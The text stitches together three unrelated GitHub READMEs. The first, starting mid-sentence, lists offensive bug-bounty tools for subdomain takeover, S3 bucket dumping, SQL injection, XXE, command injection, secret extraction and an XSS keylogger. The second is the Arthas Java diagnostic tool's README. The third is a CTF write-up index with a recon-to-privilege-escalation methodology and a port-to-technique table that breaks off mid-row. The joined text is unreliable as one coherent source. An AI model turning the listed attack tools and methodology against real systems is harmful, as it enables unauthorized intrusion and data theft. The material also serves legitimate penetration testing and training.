created using a bash script, to analyze domains and collect subdomains in fast and comprehensive way . Report output in HTML or CSV format https://github.com/Screetsec/ - [dnsenum](https://github.com/fwaeytens/dnsenum) - Multithreaded perl script to enumerate DNS information of a domain and to discover non-contiguous ip blocks. ## Content Discovery ### API - [secretx](https://github.com/xyele/secretx) - Extracting api keys and secrets by requesting each url in your list. ### AWS S3 Bucket - [s3brute](https://github.com/ghostlulzhacks/s3brute) - s3 brute force tool - [s3-bucket-finder](https://github.com/gwen001/s3-buckets-finder) - Find aws s3 buckets and extract datas. - [bucket-stream](https://github.com/eth0izzle/bucket-stream) - Find interesting Amazon S3 Buckets by watching certificate transparency logs. - [slurp](https://github.com/nuncan/slurp) - Enumerate S3 buckets via certstream, domain, or keywords. - [lazys3](https://github.com/nahamsec/lazys3) - A Ruby script to bruteforce for AWS s3 buckets using different permutations. - [cred_scanner](https://github.com/disruptops/cred_scanner) - A simple file-based scanner to look for potential AWS access and secret keys in files - [DumpsterDiver](https://github.com/securing/DumpsterDiver) - A tool used to analyze big volumes of various file types in search of harcoded secrets like keys (AWS Access Key, Azuer Share Key or SSH keys) or passwords. - [S3Scanner](https://github.com/sa7mon/S3Scanner) - Scan for open AWS S3 buckets and dump the contents ### Inspecting JS Files - [JSParser](https://github.com/nahamsec/JSParser) - A python 2.7 script using Tornado and JSBeautifier to parse relative URLs from JavaScript files. - [relative-url-extractor](https://github.com/jobertabma/relative-url-extractor) - A small tool that extracts relative URLs from a file. - [github-search](https://raw.githubusercontent.com/gwen001/github-search/master/github-subdomains.py) - [sub.js](https://github.com/lc/subjs) - A tool to get javascript files from a list of URLS or subdomains - [LinkFinder](https://github.com/GerbenJavado/LinkFinder) - A python script that finds endpoints in JavaScript files ### Code Audit - [Cobra](https://github.com/WhaleShark-Team/cobra) - Source Code Security Audit (源代码安全审计) ### Crawlers - [Crawler](https://github.com/ghostlulzhacks/crawler) - Crawl website extract links - [waybackMachine](https://github.com/ghostlulzhacks/waybackMachine) - Use wayback Machine data to pull a list of paths. - [meg](https://github.com/tomnomnom/meg) - Fetch many paths for many hosts - without killing the hosts - [hakrawler](https://github.com/hakluke/hakrawler) - Simple, fast web crawler designed for easy, quick discovery of endpoints and assets within a web application - [igoturls](https://github.com/xyele/igoturls) - WaybackURLS + OtxURLS + CommonCrawl ### Directory Bruteforcers & Fuzzers - [gobuster](https://github.com/OJ/gobuster) - Directory/File, DNS and VHost busting tool written in Go - [ffuf](https://github.com/ffuf/ffuf) - Fast web fuzzer written in Go - [dirsearch](https://github.com/maurosoria/dirsearch) - Web path scanner ## Exploitation ### Subdomain Takeover - [subjack](https://github.com/haccer/subjack) - Subdomain Takeover tool written in Go - [subdomain-takeover](https://github.com/antichown/subdomain-takeover) - Subdomain Takeover Scanner | Subdomain Takeover Tool | by 0x94 - [takeover](https://github.com/m4ll0k/takeover) - Sub-Domain TakeOver Vulnerability Scanner - [SubOver](https://github.com/Ice3man543/SubOver) - A Powerful Subdomain Takeover Tool ### Google Cloud Storage - [GCPBucketBrute](https://github.com/RhinoSecurityLabs/GCPBucketBrute) - A script to enumerate Google Storage buckets, determine what access you have to them, and determine if they can be privilege escalated. ### Digital Ocean - [spaces-finder](https://github.com/appsecco/spaces-finder) - A tool to hunt for publicly accessible DigitalOcean Spaces ### XXE - [XXEinjector](https://github.com/enjoiz/XXEinjector) - Tool for automatic exploitation of XXE vulnerability using direct and different out of band methods. ### CSRF - [XSRFProbe](https://github.com/0xInfection/XSRFProbe) - The Prime Cross Site Request Forgery (CSRF) Audit and Exploitation Toolkit. ### Command Injection - [commix](https://github.com/commixproject/commix) - Automated All-in-One OS command injection and exploitation tool. https://commixproject.com ### SQLi - [sqlmap](https://github.com/sqlmapproject/sqlmap) - Automatic SQL injection and database takeover tool http://sqlmap.org - [sqliv](https://github.com/the-robot/sqliv) - massive SQL injection vulnerability scanner - [sqlmate](https://github.com/s0md3v/sqlmate) - A friend of SQLmap which will do what you always expected from SQLmap. ### XSS - [XSStrike](https://github.com/s0md3v/XSStrike) - Most advanced XSS scanner. - [XSS-keylogger](https://github.com/hadynz/xss-keylogger) - A keystroke logger to exploit XSS vulnerabilities in a site - for my personal Educational purposes only ## CMS - [CMSmap](https://github.com/Dionach/CMSmap) - CMSmap is a python open source CMS scanner that automates the process of detecting security flaws of the most popular CMSs. - [CMSeeK](https://github.com/Tuhinshubhra/CMSeeK) - CMS Detection and Exploitation suite - Scan WordPress, Joomla, Drupal and over 170 other CMSs - [wpscan](https://github.com/wpscanteam/wpscan) - WPScan is a free, for non-commercial use, black box WordPress Vulnerability Scanner written for security professionals and blog maintainers to test the security of their WordPress websites - [Joomscan](https://github.com/rezasp/joomscan) - OWASP Joomla Vulnerability Scanner Project - [Droopescan](https://github.com/droope/droopescan) - A plugin-based scanner that aids security researchers in identifying issues with several CMSs, mainly Drupal & Silverstripe. - [Drupwn](https://github.com/immunIT/drupwn) - Drupal enumeration & exploitation tool ## CloudFlare - [CloudFail](https://github.com/m0rtem/CloudFail) - Utilize misconfigured DNS and old database records to find hidden IP's behind the CloudFlare network ## Git - [truffleHog](https://github.com/dxa4481/truffleHog.git) - Searches through git repositories for high entropy strings and secrets, digging deep into commit history - [git-dumper](https://github.com/arthaud/git-dumper) - A tool to dump a git repository from a website ## Frameworks - [Sn1per](https://github.com/1N3/Sn1per) - Automated pentest framework for offensive security experts - [XRay](https://github.com/evilsocket/xray) - XRay is a tool for recon, mapping and OSINT gathering from public networks. - [datasploit](https://github.com/DataSploit/datasploit) - An #OSINT Framework to perform various recon techniques on Companies, People, Phone Number, Bitcoin Addresses, etc., aggregate all the raw data, and give data in multiple formats. - [Osmedeus](https://github.com/j3ssie/Osmedeus) - Fully automated offensive security framework for reconnaissance and vulnerability scanning - [TIDoS-Framework](https://github.com/0xinfection/tidos-framework) - The Offensive Manual Web Application Penetration Testing Framework. - [discover](https://github.com/leebaird/discover) - Custom bash scripts used to automate various penetration testing tasks including recon, scanning, parsing, and creating malicious payloads and listeners with Metasploit. - [lazyrecon](https://github.com/nahamsec/lazyrecon) - This script is intended to automate your reconnaissance process in an organized fashion - [003Recon](https://github.com/003random/003Recon) - Some tools to automate recon - 003random - [LazyRecon](https://github.com/capt-meelo/LazyRecon) - An automated approach to performing recon for bug bounty hunting and penetration testing. - [Vulmap](https://github.com/zhzyker/vulmap) - Vulmap is a web vulnerability scanning and verification tool that can scan webapps for vulnerabilities and has a vulnerability verification function ## Wordlists - [SecLists](https://github.com/danielmiessler/SecLists) - SecLists is the security tester's companion. It's a collection of multiple types of lists used during security assessments, collected in one place. List types include usernames, passwords, URLs, sensitive data patterns, fuzzing payloads, web shells, and many more. - [Jhaddix Wordlist](https://gist.githubusercontent.com/jhaddix/b80ea67d85c13206125806f0828f4d10/raw/c81a34fe84731430741e0463eb6076129c20c4c0/content_discovery_all.txt) - [Nahamsec list](https://gist.githubusercontent.com/Leoid/38984017886cd058a314dfda5c3d6c6e/raw/1ee5fe1da82a3ae92b0c486f86fbe26bbdff1e06/Nahamsec%2520Thread) ## Other - [altdns](https://github.com/infosec-au/altdns) - Generates permutations, alterations and mutations of subdomains and then resolves them - [nmap](https://nmap.org/) - network mapper - [Blazy](https://github.com/s0md3v/Blazy) - Blazy is a modern login bruteforcer which also tests for CSRF, Clickjacking, Cloudflare and WAF. - [httprobe](https://github.com/tomnomnom/httprobe) - Take a list of domains and probe for working HTTP and HTTPS servers - [broken-link-checker](https://github.com/stevenvachon/broken-link-checker) - Find broken links, missing images, etc within your HTML. - [wafw00f](https://github.com/EnableSecurity/wafw00f) - WAFW00F allows one to identify and fingerprint Web Application Firewall (WAF) products protecting a website.
## Arthas ![arthas](site/src/site/sphinx/arthas.png) [![Build Status](https://travis-ci.org/alibaba/arthas.svg?branch=master)](https://travis-ci.org/alibaba/arthas) [![codecov](https://codecov.io/gh/alibaba/arthas/branch/master/graph/badge.svg)](https://codecov.io/gh/alibaba/arthas) ![maven](https://img.shields.io/maven-central/v/com.taobao.arthas/arthas-packaging.svg) ![license](https://img.shields.io/github/license/alibaba/arthas.svg) [![Average time to resolve an issue](http://isitmaintained.com/badge/resolution/alibaba/arthas.svg)](http://isitmaintained.com/project/alibaba/arthas "Average time to resolve an issue") [![Percentage of issues still open](http://isitmaintained.com/badge/open/alibaba/arthas.svg)](http://isitmaintained.com/project/alibaba/arthas "Percentage of issues still open") `Arthas` is a Java Diagnostic tool open sourced by Alibaba. Arthas allows developers to troubleshoot production issues for Java applications without modifying code or restarting servers. [中文说明/Chinese Documentation](README_CN.md) ### Background Often times, the production system network is inaccessible from the local development environment. If issues are encountered in production systems, it is impossible to use IDEs to debug the application remotely. More importantly, debugging in production environment is unacceptable, as it will suspend all the threads, resulting in the suspension of business services. Developers could always try to reproduce the same issue on the test/staging environment. However, this is tricky as some issues cannot be be reproduced easily on a different environment, or even disappear once restarted. And if you're thinking of adding some logs to your code to help troubleshoot the issue, you will have to go through the following lifecycle; test, staging, and then to production. Time is money! This approach is inefficient! Besides, the issue may not be reproducible once the JVM is restarted, as described above. Arthas was built to solve these issues. A developer can troubleshoot your production issues on-the-fly. No JVM restart, no additional code changes. Arthas works as an observer, which will never suspend your existing threads. ### Key features * Check whether a class is loaded, or where the class is being loaded. (Useful for troubleshooting jar file conflicts) * Decompile a class to ensure the code is running as expected. * View classloader statistics, e.g. the number of classloaders, the number of classes loaded per classloader, the classloader hierarchy, possible classloader leaks, etc. * View the method invocation details, e.g. method parameter, return object, thrown exception, and etc. * Check the stack trace of specified method invocation. This is useful when a developers wants to know the caller of the said method. * Trace the method invocation to find slow sub-invocations. * Monitor method invocation statistics, e.g. qps, rt, success rate and etc. * Monitor system metrics, thread states and cpu usage, gc statistics, and etc. * Supports command line interactive mode, with auto-complete feature enabled. * Supports telnet and websocket, which enables both local and remote diagnostics with command line and browsers. * Supports JDK 6+. * Supports Linux/Mac/Windows. ### Online Tutorials(Recommend) * [Arthas Basics](https://alibaba.github.io/arthas/arthas-tutorials?language=en&id=arthas-basics) * [Arthas Advanced](https://alibaba.github.io/arthas/arthas-tutorials?language=en&id=arthas-advanced) ### Quick start #### Use `arthas-boot`(Recommend) Download`arthas-boot.jar`,Start with `java` command: ```bash wget https://alibaba.github.io/arthas/arthas-boot.jar java -jar arthas-boot.jar ``` Print usage: ```bash java -jar arthas-boot.jar -h ``` #### Use `as.sh` You can install Arthas with one single line command on Linux, Unix, and Mac. Copy the following command and paste it into the command line, then press *Enter* to run: ```bash curl -L https://alibaba.github.io/arthas/install.sh | sh ``` The command above will download the bootstrap script `as.sh` to the current directory. You can move it the any other place you want, or put its location in `$PATH`. You can enter its interactive interface by executing `as.sh`, or execute `as.sh -h` for more help information. ### Documentation * [Online Tutorials(Recommend)](https://alibaba.github.io/arthas/arthas-tutorials?language=en) * [User manual](https://alibaba.github.io/arthas/en) * [Installation](https://alibaba.github.io/arthas/en/install-detail.html) * [Quick start](https://alibaba.github.io/arthas/en/quick-start.html) * [Advanced usage](https://alibaba.github.io/arthas/en/advanced-use.html) * [Commands](https://alibaba.github.io/arthas/en/commands.html) * [Docker](https://alibaba.github.io/arthas/en/docker.html) * [User cases](https://github.com/alibaba/arthas/issues?q=label%3Auser-case) * [Questions and answers](https://github.com/alibaba/arthas/issues?utf8=%E2%9C%93&q=label%3Aquestion-answered+) * [How to contribute](https://github.com/alibaba/arthas/blob/master/CONTRIBUTING.md) * [Release Notes](https://alibaba.github.io/arthas/en/release-notes.html) ### Feature Showcase #### Dashboard * https://alibaba.github.io/arthas/en/dashboard ![dashboard](site/src/site/sphinx/_static/dashboard.png) #### Thread See what is eating your cpu (ranked by top cpu usage) and what is going on there in one glance: ```bash $ thread -n 3 "as-command-execute-daemon" Id=29 cpuUsage=75% RUNNABLE at sun.management.ThreadImpl.dumpThreads0(Native Method) at sun.management.ThreadImpl.getThreadInfo(ThreadImpl.java:440) at com.taobao.arthas.core.command.monitor200.ThreadCommand$1.action(ThreadCommand.java:58) at com.taobao.arthas.core.command.handler.AbstractCommandHandler.execute(AbstractCommandHandler.java:238) at com.taobao.arthas.core.command.handler.DefaultCommandHandler.handleCommand(DefaultCommandHandler.java:67) at com.taobao.arthas.core.server.ArthasServer$4.run(ArthasServer.java:276) at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1145) at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:615) at java.lang.Thread.run(Thread.java:745) Number of locked synchronizers = 1 - java.util.concurrent.ThreadPoolExecutor$Worker@6cd0b6f8 "as-session-expire-daemon" Id=25 cpuUsage=24% TIMED_WAITING at java.lang.Thread.sleep(Native Method) at com.taobao.arthas.core.server.DefaultSessionManager$2.run(DefaultSessionManager.java:85) "Reference Handler" Id=2 cpuUsage=0% WAITING on java.lang.ref.Reference$Lock@69ba0f27 at java.lang.Object.wait(Native Method) - waiting on java.lang.ref.Reference$Lock@69ba0f27 at java.lang.Object.wait(Object.java:503) at java.lang.ref.Reference$ReferenceHandler.run(Reference.java:133) ``` #### jad Decompile your class with one shot: ```java $ jad javax.servlet.Servlet ClassLoader: +-java.net.URLClassLoader@6108b2d7 +-sun.misc.Launcher$AppClassLoader@18b4aac2 +-sun.misc.Launcher$ExtClassLoader@1ddf84b8 Location: /Users/xxx/work/test/lib/servlet-api.jar /* * Decompiled with CFR 0_122. */ package javax.servlet; import java.io.IOException; import javax.servlet.ServletConfig; import javax.servlet.ServletException; import javax.servlet.ServletRequest; import javax.servlet.ServletResponse; public interface Servlet { public void init(ServletConfig var1) throws ServletException; public ServletConfig getServletConfig(); public void service(ServletRequest var1, ServletResponse var2) throws ServletException, IOException; public String getServletInfo(); public void destroy(); } ``` #### mc Memory compiler, compiles `.java` files into `.class` files in memory. ```bash mc /tmp/Test.java ``` #### redefine Load the external `*.class` files to re-define the loaded classes in JVM. ```bash redefine /tmp/Test.class redefine -c 327a647b /tmp/Test.class /tmp/Test\$Inner.class ``` #### sc Search any loaded class with detailed information. ```bash $ sc -d org.springframework.web.context.support.XmlWebApplicationContext class-info org.springframework.web.context.support.XmlWebApplicationContext code-source /Users/xxx/work/test/WEB-INF/lib/spring-web-3.2.11.RELEASE.jar name org.springframework.web.context.support.XmlWebApplicationContext isInterface false isAnnotation false isEnum false isAnonymousClass false isArray false isLocalClass false isMemberClass false isPrimitive false isSynthetic false simple-name XmlWebApplicationContext modifier public annotation interfaces super-class +-org.springframework.web.context.support.AbstractRefreshableWebApplicationContext +-org.springframework.context.support.AbstractRefreshableConfigApplicationContext +-org.springframework.context.support.AbstractRefreshableApplicationContext +-org.springframework.context.support.AbstractApplicationContext +-org.springframework.core.io.DefaultResourceLoader +-java.lang.Object class-loader +-org.apache.catalina.loader.ParallelWebappClassLoader +-java.net.URLClassLoader@6108b2d7 +-sun.misc.Launcher$AppClassLoader@18b4aac2 +-sun.misc.Launcher$ExtClassLoader@1ddf84b8 classLoaderHash 25131501 ``` #### stack View the call stack of `test.arthas.TestStack#doGet`: ```bash $ stack test.arthas.TestStack doGet Press Ctrl+C to abort. Affect(class-cnt:1 , method-cnt:1) cost in 286 ms. ts=2018-09-18 10:11:45;thread_name=http-bio-8080-exec-10;id=d9;is_daemon=true;priority=5;TCCL=org.apache.catalina.loader.ParallelWebappClassLoader@25131501 @test.arthas.TestStack.doGet() at javax.servlet.http.HttpServlet.service(HttpServlet.java:624) at javax.servlet.http.HttpServlet.service(HttpServlet.java:731) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:303) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208) at org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:52) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208) at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:220) at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:110) ... at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:169) at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:103) at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:116) at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:451) at org.apache.coyote.http11.AbstractHttp11Processor.process(AbstractHttp11Processor.java:1121) at org.apache.coyote.AbstractProtocol$AbstractConnectionHandler.process(AbstractProtocol.java:637) at org.apache.tomcat.util.net.JIoEndpoint$SocketProcessor.run(JIoEndpoint.java:316) at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142) at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:617) at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61) at java.lang.Thread.run(Thread.java:745) ``` #### Trace See what is slowing down your method invocation with trace command: ![trace](site/src/site/sphinx/_static/trace.png) #### Watch Watch the first parameter and thrown exception of `test.arthas.TestWatch#doGet` only if it throws exception. ```bash $ watch test.arthas.TestWatch doGet {params[0], throwExp} -e Press Ctrl+C to abort. Affect(class-cnt:1 , method-cnt:1) cost in 65 ms. ts=2018-09-18 10:26:28;result=@ArrayList[ @RequestFacade[org.apache.catalina.connector.RequestFacade@79f922b2], @NullPointerException[java.lang.NullPointerException], ] ``` #### Monitor Monitor a specific method invocation statistics, including total number of invocations, average response time, success rate, and every 5 seconds: ```bash $ monitor -c 5 org.apache.dubbo.demo.provider.DemoServiceImpl sayHello Press Ctrl+C to abort. Affect(class-cnt:1 , method-cnt:1) cost in 109 ms. timestamp class method total success fail avg-rt(ms) fail-rate ---------------------------------------------------------------------------------------------------------------------------- 2018-09-20 09:45:32 org.apache.dubbo.demo.provider.DemoServiceImpl sayHello 5 5 0 0.67 0.00% timestamp class method total success fail avg-rt(ms) fail-rate ---------------------------------------------------------------------------------------------------------------------------- 2018-09-20 09:45:37 org.apache.dubbo.demo.provider.DemoServiceImpl sayHello 5 5 0 1.00 0.00% timestamp class method total success fail avg-rt(ms) fail-rate ---------------------------------------------------------------------------------------------------------------------------- 2018-09-20 09:45:42 org.apache.dubbo.demo.provider.DemoServiceImpl sayHello 5 5 0 0.43 0.00% ``` #### Time Tunnel(tt) Record method invocation data, so that you can check the method invocation parameters, returned value, and thrown exceptions later. It works as if you could come back and replay the past method invocation via time tunnel. ```bash $ tt -t org.apache.dubbo.demo.provider.DemoServiceImpl sayHello Press Ctrl+C to abort. Affect(class-cnt:1 , method-cnt:1) cost in 75 ms. INDEX TIMESTAMP COST(ms) IS-RET IS-EXP OBJECT CLASS METHOD ------------------------------------------------------------------------------------------------------------------------------------- 1000 2018-09-20 09:54:10 1.971195 true false 0x55965cca DemoServiceImpl sayHello 1001 2018-09-20 09:54:11 0.215685 true false 0x55965cca DemoServiceImpl sayHello 1002 2018-09-20 09:54:12 0.236303 true false 0x55965cca DemoServiceImpl sayHello 1003 2018-09-20 09:54:13 0.159598 true false 0x55965cca DemoServiceImpl sayHello 1004 2018-09-20 09:54:14 0.201982 true false 0x55965cca DemoServiceImpl sayHello 1005 2018-09-20 09:54:15 0.214205 true false 0x55965cca DemoServiceImpl sayHello 1006 2018-09-20 09:54:16 0.241863 true false 0x55965cca DemoServiceImpl sayHello 1007 2018-09-20 09:54:17 0.305747 true false 0x55965cca DemoServiceImpl sayHello 1008 2018-09-20 09:54:18 0.18468 true false 0x55965cca DemoServiceImpl sayHello ``` #### Classloader ```bash $ classloader name numberOfInstances loadedCountTotal BootstrapClassLoader 1 3346 com.taobao.arthas.agent.ArthasClassloader 1 1262 java.net.URLClassLoader 2 1033 org.apache.catalina.loader.ParallelWebappClassLoader 1 628 sun.reflect.DelegatingClassLoader 166 166 sun.misc.Launcher$AppClassLoader 1 31 com.alibaba.fastjson.util.ASMClassLoader 6 15 sun.misc.Launcher$ExtClassLoader 1 7 org.jvnet.hk2.internal.DelegatingClassLoader 2 2 sun.reflect.misc.MethodUtil 1 1 ``` #### Web Console * https://alibaba.github.io/arthas/en/web-console ![web console](site/src/site/sphinx/_static/web-console-local.png) ### Known Users Welcome to register the company name in this issue: https://github.com/alibaba/arthas/issues/111 (in order of registration) ![Alibaba](static/alibaba.png) ![Alipay](static/alipay.png) ![Aliyun](static/aliyun.png) ![Taobao](static/taobao.png) ![Tmall](static/tmall.png) ![微医](static/weiyi.png) ![卓越教育](static/zhuoyuejiaoyu.png) ![狐狸金服](static/hulijingfu.png) ![三体云](static/santiyun.png) ![证大文化](static/zhengdawenhua.png) ![Acmedcare+](static/acmedcare.png) ![好慷](static/homeking365_log.png) ![来电科技](static/laidian.png) ![四格互联](static/sigehulian.png) ![ICBC](static/icbc.png) ![陆鹰](static/luying.png) ![玩友时代](static/wangyoushidai.png) ![她社区](static/tashequ.png) ![龙腾出行](static/longtengchuxing.png) ![foscam](static/foscam.png) ![二维火](static/2dfire.png) ![lanxum](static/lanxum_com.png) ![纳里健康](static/ngarihealth.png) ![掌门1对1](static/zhangmen.png) ![offcn](static/offcn.png) ![sia](static/sia.png) ![振安资产](static/zhenganzichang.png) ![菠萝](static/bolo.png) ![中通快递](static/zto.png) ![光点科技](static/guangdian.png) ![广州工程技术职业学院](static/gzvtc.jpg) ![mstar](static/mstar.png) ![xwbank](static/xwbank.png) ![imexue](static/imexue.png) ![keking](static/keking.png) ![secoo](static/secoo.jpg) ![viax](static/viax.png) ![yanedu](static/yanedu.png) ![duia](static/duia.png) ![哈啰出行](static/hellobike.png) ![hollycrm](static/hollycrm.png) ![citycloud](static/citycloud.jpg) ![yidianzixun](static/yidianzixun.png) ![神州租车](static/zuche.png) ![天眼查](static/tianyancha.png) ![商脉云](static/anjianyun.png) ![三新文化](static/sanxinbook.png) ![雪球财经](static/xueqiu.png) ![百安居](static/bthome.png) ![安心保险](static/95303.png) ![杭州源诚科技](static/hzyc.png) ![91moxie](static/91moxie.png) ### Credit #### Contributors This project exists thanks to all the people who contribute. <a href="https://github.com/alibaba/arthas/graphs/contributors"><img src="https://opencollective.com/arthas/contributors.svg?width=890&button=false" /></a> #### Projects * [greys-anatomy](https://github.com/oldmanpushcart/greys-anatomy): The Arthas code base has derived from Greys, we thank for the excellent work done by Greys. * [termd](https://github.com/termd/termd): Arthas's terminal implementation is based on termd, an open source library for writing terminal applications in Java. * [crash](https://github.com/crashub/crash): Arthas's text based user interface rendering is based on codes extracted from [here](https://github.com/crashub/crash/tree/1.3.2/shell) * [cli](https://github.com/eclipse-vertx/vert.x/tree/master/src/main/java/io/vertx/core/cli): Arthas's command line interface implementation is based on cli, open sourced by vert.x * [compiler](https://github.com/skalogs/SkaETL/tree/master/compiler) Arthas's memory compiler. * [Apache Commons Net](https://commons.apache.org/proper/commons-net/) Arthas's telnet client.
# 📖 ReadMe [![License: CC BY-SA 4.0](https://raw.githubusercontent.com/7h3rAm/7h3rAm.github.io/master/static/files/ccbysa4.svg)](https://creativecommons.org/licenses/by-sa/4.0/) <a name="contents"></a> ## 🔖 Contents - ☀️ [Methodology](#methodology) * ⚙️ [Phase 0: Recon](#mrecon) * ⚙️ [Phase 1: Enumerate](#menumerate) * ⚙️ [Phase 2: Exploit](#mexploit) * ⚙️ [Phase 3: PrivEsc](#mprivesc) - ☀️ [Stats](#stats) * 📊 [Counts](#counts) * 📊 [Top Categories](#topcategories) * 📊 [Top Ports/Protocols/Services](#topportsprotocolsservices) * 📊 [Top TTPs](#topttps) - ⚡ [Mapping](#mapping) - 💥 [Machines](#machines) - ☢️ [TTPs](#ttps) * ⚙️ [Enumerate](#enumerate) * ⚙️ [Exploit](#exploit) * ⚙️ [PrivEsc](#privesc) - ⚡ [Tips](#tips) - 💥 [Tools](#tools) - 🔥 [Loot](#loot) * 🔑 [Credentials](#credentials) * 🔑 [Hashes](#hashes) <a name="methodology"></a> ## ☀️ Methodology [↟](#contents) <a name="mrecon"></a> ### ⚙️ Phase #0: Recon [🡑](#methodology) **Goal**: to scan all ports on &lt;targetip&gt; **Process**: * [enumerate_nmap_initial](#enumerate_nmap_initial) * [enumerate_nmap_tcp](#enumerate_nmap_tcp) * [enumerate_nmap_udp](#enumerate_nmap_udp) <a name="menumerate"></a> ### ⚙️ Phase #1: Enumerate [🡑](#methodology) **Goal**: to find service and version details **Process**: * find ttps for open ports * start with weird services * identify installed software and version * find critical cve/exploits * enumerate more common services - smb/ftp * enumerate services with large attack vector like http at the end <a name="mexploit"></a> ### ⚙️ Phase #2: Exploit [🡑](#methodology) **Goal**: gain interactive access on &lt;targetip&gt; **Process**: * debug available exploits for open ports <a name="mprivesc"></a> ### ⚙️ Phase #3: PrivEsc [🡑](#methodology) **Goal**: gain elevated privileges on &lt;targetip&gt; **Process**: * debug available exploits or misconfigurations * for nix, use [linux smart enum](https://github.com/diego-treitos/linux-smart-enumeration) * for windows, use [winpeas](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite) <a name="stats"></a> ## ☀️ Stats [↟](#contents) ### 📊 Counts [🡑](#stats) | # | TryHackMe | HackTheBox | VulnHub | OSCPlike | Owned | |:--------:|:---------------:|:-----------------:|:-----------------:|:-----------------:|:-----------------:| | Total | `1/462 (0.22%)` | `25/248 (10.08%)` | `24/711 (3.38%)` | `46/254 (18.11%)` | `50/1421 (3.52%)` | | Windows | `0/0 (0.00%)` | `12/73 (16.44%)` | `0/2 (0.00%)` | `12/39 (30.77%)` | `12/75 (16.00%)` | | *nix | `0/0 (0.00%)` | `13/175 (7.43%)` | `24/709 (3.39%)` | `34/177 (19.21%)` | `37/884 (4.19%)` | | OSCPlike | `0/38 (0.00%)` | `25/94 (26.60%)` | `21/122 (17.21%)` | | `46/254 (18.11%)` | <a name="topcategories"></a> ### 📊 Top Categories [🡑](#stats) <img src="./top_categories.png" height="320" /> <a name="topportsprotocolsservices"></a> ### 📊 Top Ports/Protocols/Services [🡑](#stats) <img src="./top_ports.png" height="320" /> --- <img src="./top_protocols.png" height="320" /> --- <img src="./top_services.png" height="320" /> <a name="topttps"></a> ### 📊 Top TTPs [🡑](#stats) <img src="./top_ttps_enumerate.png" height="320" /> --- <img src="./top_ttps_exploit.png" height="320" /> --- <img src="./top_ttps_privesc.png" height="320" /> <a name="mapping"></a> ## ⚡ Mapping [↟](#contents) | # | Port | Service | TTPs | TTPs - ITW | |---|------|-----------|------|------------| | 1. | `21/tcp` | `ftp/Microsoft ftpd`<br /><br />`ftp/vsftpd 2.3.5` | [`enumerate_proto_ftp`](https://github.com/7h3rAm/writeups#enumerate_proto_ftp) | [`enumerate_proto_ftp`](https://github.com/7h3rAm/writeups#enumerate_proto_ftp), [`exploit_ftp_anonymous`](https://github.com/7h3rAm/writeups#exploit_ftp_anonymous), [`exploit_ftp_web_root`](https://github.com/7h3rAm/writeups#exploit_ftp_web_root) | | 2. | `22/tcp` | `ssh/OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)`<br /><br />`ssh/OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)`<br /><br />`ssh/OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)`<br /><br />`ssh/OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)` | [`enumerate_proto_ssh`](https://github.com/7h3rAm/writeups#enumerate_proto_ssh) | [`enumerate_proto_ssh`](https://github.com/7h3rAm/writeups#enumerate_proto_ssh), [`exploit_defaultcreds`](https://github.com/7h3rAm/writeups#exploit_defaultcreds), [`exploit_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#exploit_ssh_authorizedkeys), [`exploit_ssh_bruteforce`](https://github.com/7h3rAm/writeups#exploit_ssh_bruteforce), [`privesc_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#privesc_ssh_authorizedkeys), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | | 3. | `23/tcp` | | [`enumerate_proto_telnet`](https://github.com/7h3rAm/writeups#enumerate_proto_telnet) | | | 4. | `25/tcp` | | [`enumerate_proto_smtp`](https://github.com/7h3rAm/writeups#enumerate_proto_smtp) | | | 5. | `53/tcp` | | [`enumerate_proto_dns`](https://github.com/7h3rAm/writeups#enumerate_proto_dns) | | | 6. | `79/tcp` | | [`enumerate_proto_finger`](https://github.com/7h3rAm/writeups#enumerate_proto_finger) | | | 7. | `80/tcp` | `http/2.4.18 ((Ubuntu))`<br /><br />`http/Apache httpd`<br /><br />`http/Apache httpd 2.0.52 ((CentOS))`<br /><br />`http/Apache httpd 2.2.15 ((CentOS) DAV/2 PHP/5.3.3)`<br /><br />`http/Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)`<br /><br />`http/Apache httpd 2.2.22 ((Ubuntu))`<br /><br />`http/Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)`<br /><br />`http/Apache httpd 2.4.18 ((Ubuntu))`<br /><br />`http/Apache httpd 2.4.25 ((Debian))`<br /><br />`http/Apache httpd 2.4.29`<br /><br />`http/Apache httpd 2.4.29 ((Ubuntu))`<br /><br />`http/Apache httpd 2.4.34 ((Ubuntu))`<br /><br />`http/Apache httpd 2.4.41 ((Ubuntu))`<br /><br />`http/Apache httpd 2.4.7 ((Ubuntu))`<br /><br />`http/HttpFileServer httpd 2.3`<br /><br />`http/Microsoft IIS httpd 